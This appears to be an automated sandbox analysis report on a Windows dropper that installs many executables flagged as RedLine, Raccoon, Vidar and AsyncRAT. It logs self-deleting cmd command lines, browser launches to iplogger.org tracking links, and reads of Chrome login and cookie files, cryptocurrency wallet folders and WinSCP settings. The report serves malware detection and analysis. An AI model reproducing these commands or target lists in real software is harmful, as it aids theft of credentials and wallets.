Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\me.exe "C:\Program Files (x86)\Company\NewProduct\me.exe"	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,	15_2_00409064
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,	15_2_00414900
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,	15_2_00427A30
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,	15_2_00423CA0
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	15_2_00426D20
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,	15_2_00427660
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,	15_2_0042E740
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,	15_2_0042E7B0
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,	18_2_00409064

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\safert44.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\jshainx.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_004092CF cpuid

15_2_004092CF

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_0040919C LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,

15_2_0040919C

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_0040A672 LocalAlloc,GetUserNameW,

15_2_0040A672

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7912, type: MEMORYSTR

Source: jshainx.exe, 00000019.00000002.718007552.0000000001166000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 8784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 8908, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 15.2.F0geI.exe.2080e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.22b0174.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.22b0174.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.F0geI.exe.2090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.F0geI.exe.2090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.2080e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.404710161.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.469595430.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.380590227.0000000000633000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.405187438.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.422956483.000000000062A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.362320547.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.400767389.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.402599469.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.386373584.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.403718026.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: real.exe PID: 8684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: brokerius.exe PID: 8968, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 9n6ctoq7cn.exe	String found in binary or memory: Exodus Web3 Wallet
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???H
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 0000001D.00000002.689715508.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.641024650.000000000111A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: real.exe PID: 8684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 8784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 8908, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
